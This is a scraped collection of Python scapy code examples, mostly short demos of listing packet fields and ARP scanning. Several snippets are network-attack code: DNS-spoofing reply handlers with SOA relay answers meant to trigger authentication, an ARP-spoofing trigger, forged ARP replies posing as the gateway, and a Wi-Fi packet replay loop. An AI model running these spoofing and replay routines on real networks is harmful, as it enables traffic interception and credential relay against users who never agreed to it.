Пример #1
0
def scan(ip):
    # scapy.arping(ip)
    arp_request = scapy.ARP(pdst=ip)  # instance of an ARP packet object
    # arp_request.pdst = ip
    print(arp_request.summary())
    # scapy.ls(scapy.ARP()) # get list of fields for a particular class
    broadcast = scapy.Ether(
        dst='ff:ff:ff:ff:ff:ff'
    )  # The boradcast MAC address is a "virtual MAC address" -  it does not exist in reality
    # broadcast.dst = 'ff:ff:ff:ff:ff:ff'
    scapy.ls(scapy.Ether())

    arp_request_broadcast = broadcast / arp_request
    arp_request_broadcast.show()
    answered, unanswered = scapy.srp(
        arp_request_broadcast
    )  # using srp rather tahn sr due to the custom Ether portion of the packet
    # answered_list, unanswered_list = scapy.srp(arp_request_broadcast, timeout = 1)
    answered_list = scapy.srp(arp_request_broadcast, timeout=1)[0]

    answered_list = scapy.srp(arp_request_broadcast, timeout=1,
                              verbose=False)[0]
    for element in answered_list:
        print(element[1].psrc)
        print(element[1].hwsrc)
        print("----------------------------------------------------")
Пример #2
0
def filterPacketsByCallid(packets, callid):
    filteredPackets = []
    for packet in packets:
        if isCallIdInPacket(packet, callid):
            filteredPackets.append(packet)
            scapy.ls(packet)
    return filteredPackets, len(filteredPackets)
Пример #3
0
def main():

    if len(sys.argv)<5:
        print 'pass 4 arguments: <destination> <dst_tor> <repeat> <period(ms)>'
        exit(1)

    repeat = int(sys.argv[3])
    period = float(sys.argv[4])
    addr = socket.gethostbyname(sys.argv[1])
    iface = get_if()

    print "sending on interface %s to %s" % (iface, str(addr))


    with open("attributes.txt") as f:
        attrList = (line.rstrip() for line in f)
        attrList = list(line for line in attrList if line) # Non-blank lines
        attrList = attrList[1:] #discard the first one (which is a number for other usage)

    for x in attrList:
        HulappProtocol.add_IntField(x, 0) 


    pkt =  Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(dst=addr, proto=HULAPP_PROTOCOL) / HulappProtocol(dst_tor=int(sys.argv[2]))
    # pkt.show2()
    ls(pkt)

    for i in range(repeat):
        pkt[HulappProtocol].seq_no = i;
        print "send probe: " + str(i)
        sendp(pkt, iface=iface, verbose=False)
        sleep(period/1000)
Пример #4
0
def main():
    erp_request = scapy.ARP(pdst = '10.0.2.1/24')
    '''
    now we are going to set the broadcast objects
    now using the Ether class of scapy
    '''
    broadcast = scapy.Ether()
    #now for checking the attributes we are going to use
    #scapy.ls method on this conditon please make pass the object not class
    print(broadcast.show())
    #show gives more details then summary method
    scapy.ls(scapy.Ether())
    '''
    'ff:ff:ff:ff:ff:ff' is the default value for the dst and its means its 
    request to the all the client
    dst        : DestMACField                        = 'ff:ff:ff:ff:ff:ff' (None)
    src        : SourceMACField                      = '08:00:27:74:d8:bc' (None)
    type       : XShortEnumField                     = 36864           (36864)
    '''
    '''
    now we are going to combining the both ARP and broadcast objects by 
    using the slash  /  
    ''' 
    arp_request_broadcast = broadcast/erp_request
    arp_request_broadcast.show()
    
    print(arp_request_broadcast.summary())
Пример #5
0
def uploadPacket(packet):
    scapy.ls(packet[0][1])
    print("----------------------------\n")
    if(packet[0][1].op==1):
        print("Se recibio nuevo arp request")
        print("Se ha suplantado la conexion entre ", packet[0][1].psrc," y ",packet[0][1].pdst)
        arpSpoofing(packet[0][1].psrc, packet[0][1].pdst)
        return
Пример #6
0
def send_dns_reply(p):
    if IPv6 in p:
        ip = p[IPv6]
        resp = Ether(dst=p.src, src=p.dst) / IPv6(
            dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport)
    else:
        ip = p[IP]
        resp = Ether(dst=p.src, src=p.dst) / IP(dst=ip.src, src=ip.dst) / UDP(
            dport=ip.sport, sport=ip.dport)
    dns = p[DNS]
    #only reply to IN, and to messages that dont contain answers
    if dns.qd.qclass != 1 or dns.qr != 0:
        return
    #Make sure the requested name is in unicode here
    reqname = dns.qd.qname.decode()
    #A request
    if dns.qd.qtype == 1:
        rdata = config.selfipv4
    #AAAA request
    elif dns.qd.qtype == 28:
        rdata = config.selfaddr
    #PTR request
    elif dns.qd.qtype == 12:
        # To reply for PTR requests for our own hostname
        # comment the return statement
        return
        if reqname == config.selfptr:
            #We reply with attacker.domain
            rdata = 'attacker.%s' % config.localdomain
        else:
            return
    #Not handled
    else:
        return
    if should_spoof_dns(reqname):
        resp /= DNS(id=dns.id,
                    qr=1,
                    qd=dns.qd,
                    an=DNSRR(rrname=dns.qd.qname,
                             ttl=100,
                             rdata=rdata,
                             type=dns.qd.qtype))
        try:
            sendp(resp, iface=config.default_if, verbose=False)
        except socket.error as e:
            print('Error sending spoofed DNS')
            print(e)
            if config.debug:
                ls(resp)
        print('Sent spoofed reply for %s to %s' % (reqname, ip.src))
    else:
        if config.verbose or config.debug:
            print('Ignored query for %s from %s' % (reqname, ip.src))
def scan(ip):
    arp_request = scapy.ARP()
    scapy.ls(arp_request)  # or arp_request.show()
    arp_request.pdst = ip
    #   scapy.ls(arp_request)
    #   print(arp_request.summary())   # prints ARP who is pdst says psrc

    broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
    #   scapy.ls(broadcast)
    #   print(broadcast.summary())

    arp_request_broadcast = broadcast / arp_request
    #   print(arp_request_broadcast.summary())
    #   arp_request_broadcast.show()

    answered, unanswered = scapy.srp(arp_request_broadcast, timeout=1)
    print(answered.summary())
    print(unanswered.summary())
Пример #8
0
def send_padt(mysrc, mydst, sid):
    global _debug, verbose, mylog, myiface

    if _debug:
        mylog.debug("mysrc=%s" % mysrc)
        mylog.debug("mydst=%s" % mydst)
        mylog.debug("session-id=%s" % sid)


    # from RFC-2516:
    # This packet may be sent anytime after a session is established to
    # indicate that a PPPoE session has been terminated.  It may be sent by
    # either the Host or the Access Concentrator.  The DESTINATION_ADDR
    # field is a unicast Ethernet address, the CODE field is set to 0xa7
    # and the SESSION_ID MUST be set to indicate which session is to be
    # terminated.  No TAGs are required.

    # When a PADT is received, no further PPP traffic is allowed to be sent
    # using that session.  Even normal PPP termination packets MUST NOT be
    # sent after sending or receiving a PADT.  A PPP peer SHOULD use the
    # PPP protocol itself to bring down a PPPoE session, but the PADT MAY
    # be used when PPP can not be used.

    try:
        sesid = int(sid)

    except:
        print "Session-id must be 10-base integer"
        return

    eth_frame = scp.Ether(dst=mydst, src=mysrc)
    padt_pkt = eth_frame/scp.PPPoED(code=0xa7,sessionid=sesid)
    if verbose:
        scp.ls(padt_pkt)
    #scp.ls(padt_pkt)
    mylog.info("sending PADT (sed=%d) pkt from %s (this PC) to %s" % (sesid, mysrc, mydst))
    scp.sendp(padt_pkt, iface=myiface, verbose=1)
Пример #9
0
def main():

    if len(sys.argv) < 3:
        print 'pass 3 arguments: <destination> <dst_tor> <seq_no>'
        exit(1)

    addr = socket.gethostbyname(sys.argv[1])
    iface = get_if()

    print "sending on interface %s to %s" % (iface, str(addr))

    with open("attributes.txt") as f:
        attrList = (line.rstrip() for line in f)
        attrList = list(line for line in attrList if line)  # Non-blank lines

    for x in attrList:
        HulappProtocol.add_IntField(x, 0)

    pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(
        dst=addr, proto=HULAPP_PROTOCOL) / HulappProtocol(
            dst_tor=int(sys.argv[2]), seq_no=int(sys.argv[3]))
    # pkt.show2()
    ls(pkt)
    sendp(pkt, iface=iface, verbose=False)
Пример #10
0
def write_ipv6_pcap_file(input_file_path, output_file_path):
    """Write a pcap file of traffic converted to IPv6.

       Limitations:
        - Currently non Ethernet frames are skipped.
        - Layers may go missing if you encapsulate IPv4 in IPv6

    """
    ipv6_pkts = []

    pkts = rdpcap(input_file_path)

    for pkt in pkts:
        # Ignore Non Ethernet for the moment
        if type(pkt) != Ether:
            print ("Skipping non Ethernet packet")
            continue

        # If IPv6 just add packet to to list
        if pkt.type == ETH_P_IPV6:
            print "Packet is alread IPv6"
            ipv6_pkts.append(pkt)
            continue

        iplayer = pkt.getlayer(IP)
        if iplayer != None:
            ip6layer = IPv6()
            ip6layer.dst = ip4Toip6(iplayer.dst)
            ip6layer.src = ip4Toip6(iplayer.src)
            ip6layer.payload = iplayer.payload
            pkt.type = ETH_P_IPV6
            pkt.payload = ip6layer
            # Recalulate the checksums of layers
            # and add missing fields http://stackoverflow.com/a/11648093/620304
            del ip6layer.payload.chksum
            ipv6_pkts.append(pkt)
        else:
            print ("Skipping packet\n" + ls(pkt))

    # Write the new pcap
    wrpcap(output_file_path, ipv6_pkts)
    print ("Packets written to " + output_file_path)
Пример #11
0
import scapy.all as scapy

req = scapy.ARP()
print(scapy.ls(req))
Пример #12
0
def atal(ip):
    a = scapy.ARP(ip)
    scapy.ls(scapy.ARP)
Пример #13
0
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Time : 2021/3/13 00:45
# @Author : SecCodeCat

from scapy.all import ls
from scapy.layers.inet import IP, TCP

# https://www.bilibili.com/video/BV1EV411S7py?p=5  07:34
"""
《Python渗透测试实战》配套视频
Scapy使用 类+属性 来构造数据包
Scapy中每一个协议就是一个类,协议中的字段对应着属性
实例化一个协议类,就可以创建一个该协议类型的数据包
"""

pkt = IP()
ls(pkt)
print(pkt)  # 这段bytes表示IP数据包的内容,bytes保存的就是原始的字节(二进制)数据,因此bytes对象可用于在网络中传输数据
Пример #14
0
#!/usr/bin/python3
# Scapy is a python library that allows us to design, manipulate, intercept and process packets
# Scapy sets header fields by default.
# Have to be root to run this.

from scapy.all import IP, ICMP, sr1, ls

ip_layer = IP(src="192.168.0.1", dst="www.google.com")

#print(ip_layer.show())

icmp_req = ICMP()

# Help to list (ls) details about the layer.
print(ls(ip_layer))
print(ip_layer.show())
print(ip_layer.summary())

print(icmp_req.show())
# Add the layers together with /
packet = ip_layer / icmp_req
#print(packet.show())
received_packet = sr1(packet)

if received_packet:
    print(received_packet.show())
Пример #15
0
def send_dns_reply(p):
    if IPv6 in p:
        ip = p[IPv6]
        resp = Ether(dst=p.src, src=p.dst) / IPv6(
            dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport)
    else:
        ip = p[IP]
        resp = Ether(dst=p.src, src=p.dst) / IP(dst=ip.src, src=ip.dst) / UDP(
            dport=ip.sport, sport=ip.dport)
    dns = p[DNS]
    # only reply to IN, and to messages that dont contain answers
    if dns.qd.qclass != 1 or dns.qr != 0:
        return
    # Make sure the requested name is in unicode here
    reqname = dns.qd.qname.decode()
    # A query
    if dns.qd.qtype == 1:
        rdata = config.selfipv4
    # AAAA query
    elif dns.qd.qtype == 28:
        rdata = config.selfaddr
    # PTR query
    elif dns.qd.qtype == 12:
        # To reply for PTR requests for our own hostname
        # comment the return statement
        return
        if reqname == config.selfptr:
            #We reply with attacker.domain
            rdata = 'attacker.%s' % config.localdomain
        else:
            return
    # SOA query
    elif dns.qd.qtype == 6 and config.relay:
        if dns.opcode == 5:
            if config.verbose or config.debug:
                print('Dynamic update found, refusing it to trigger auth')
            resp /= DNS(id=dns.id,
                        qr=1,
                        qd=dns.qd,
                        ns=dns.ns,
                        opcode=5,
                        rcode=5)
            sendp(resp, verbose=False)
        else:
            rdata = config.selfaddr
            resp /= DNS(id=dns.id,
                        qr=1,
                        qd=dns.qd,
                        nscount=1,
                        arcount=1,
                        ancount=1,
                        an=DNSRRSOA(rrname=dns.qd.qname,
                                    ttl=100,
                                    mname="%s." % config.relay,
                                    rname="mitm6",
                                    serial=1337,
                                    type=dns.qd.qtype),
                        ns=DNSRR(rrname=dns.qd.qname,
                                 ttl=100,
                                 rdata=config.relay,
                                 type=2),
                        ar=DNSRR(rrname=config.relay,
                                 type=1,
                                 rclass=1,
                                 ttl=300,
                                 rdata=config.selfipv4))
            sendp(resp, verbose=False)
            if config.verbose or config.debug:
                print('Sent SOA reply')
        return
    #Not handled
    else:
        return
    if should_spoof_dns(reqname):
        resp /= DNS(id=dns.id,
                    qr=1,
                    qd=dns.qd,
                    an=DNSRR(rrname=dns.qd.qname,
                             ttl=100,
                             rdata=rdata,
                             type=dns.qd.qtype))
        try:
            sendp(resp, iface=config.default_if, verbose=False)
        except socket.error as e:
            print('Error sending spoofed DNS')
            print(e)
            if config.debug:
                ls(resp)
        print('Sent spoofed reply for %s to %s' % (reqname, ip.src))
    else:
        if config.verbose or config.debug:
            print('Ignored query for %s from %s' % (reqname, ip.src))
Пример #16
0
def toList_scapy_field_info(object_):
    scapy.ls(object_)
Пример #17
0
def scan(ip):
    arp_request = scapy.ARP(pdst=ip)
    print arp_request.summary()
    scapy.ls(scapy.ARP())
Пример #18
0
def scan(ip):
    #Below wants more information about the request
    arp_request = scapy.ARP()
    arp_request.pdst = ip  # Will be put in where the IPs are
    print(arp_request.summary())
    scapy.ls(scapy.ARP())
Пример #19
0
def scan(ip):
    arp_requet = scapy.ARP(pdst=ip)  #
    broadcast = scapy.Ether()
    scapy.ls(scapy.Ether())
    print(arp_requet.summary())
Пример #20
0
def scan(ip):
    arp_request = scapy.ARP()
    print(arp_request.summary)
    scapy.ls(scapy.ARP)
import scapy.all as scapy

scapy.ls(scapy.ARP())

# psrc = your ip
# hwsrc = your mac
# op = 1  for request
# op = 2  for response
# pdst = target ip
# hwdst = target mac
#
Пример #22
0

def sniff_client(pkt):
    global AP_INFO
    if Dot11QoS in pkt:
        if (pkt.addr1 == AP_INFO['mac'] or pkt.addr2 == AP_INFO['mac']
                or pkt.addr3 == AP_INFO['mac']
                or pkt.addr4 == AP_INFO['mac']) and UDP in pkt:
            print(pkt.addr1, pkt.addr2, pkt.addr3, pkt.addr4)
            client_data.append(pkt)


sniff(count=int(sys.argv[2]), iface='wlan0mon', prn=sniff_client)

for cd in client_data:
    ls(cd)

    tmp = cd[Dot11FCS].addr1
    cd[Dot11FCS].addr1 = cd[Dot11FCS].addr3
    cd[Dot11FCS].addr3 = tmp

    tmp = cd[IP].src
    cd[IP].src = cd[IP].dst
    cd[IP].dst = tmp

    del cd[Dot11FCS].fcs
    del cd[IP].chksum
    del cd[UDP].chksum

    cd.show2()
    sendp(cd, count=1000)
Пример #23
0
import scapy.all as scapy
# this is how packet made of
packet = scapy.ARP(op=2,
                   pdst="192.168.0.117",
                   hwdst="60:a4:d0:b9:70:74",
                   psrc="192.168.0.1")
#if we dont specify hwsrc,it will be detected automatically and if we dont specify "op" then it will take 1 value
#op = 1 is request and op=2 is for response
scapy.ls(scapy.ARP)

#packet all information
print(packet.show())
#who sent ip+mac
print(packet.summary())
Пример #24
0
def scan(ip):
    arp_request = scapy.ARP(pdst = ip)  # create an instance of the scapy class and set the value of pdst
    print(arp_request.summary())        # calls a method in the ARP, implemented by scapy

    scapy.ls(scapy.ARP())               # lists all the fileds that can be set  
from scapy.all import ICMP
from scapy.all import IP
from scapy.all import sr1
from scapy.all import ls

if __name__ == "__main__":
    dest_ip = "www.google.com"

    ip_layer = IP(dst=dest_ip)
    print(ls(ip_layer))  # displaying complete layer info

    # accessing the fields
    print("Destination  = ", ip_layer.dst)

    print("Summary  = ", ip_layer.summary())
Пример #26
0
def scan(ip):
    # scp.arping(ip)
    arp_request = scp.ARP()
    arp_request.pdst = ip
    print(arp_request.summary())
    scp.ls(scp.ARP())
Пример #27
0
import scapy.all as scapy
arp_packet = scapy.ARP(op=2,
                       pdst="192.168.225.249",
                       hwdst="00-0C-29-52-47-B6",
                       psrc="192.168.225.230")
scapy.ls(arp_packet)
print(arp_packet.summary())
print(arp_packet.show())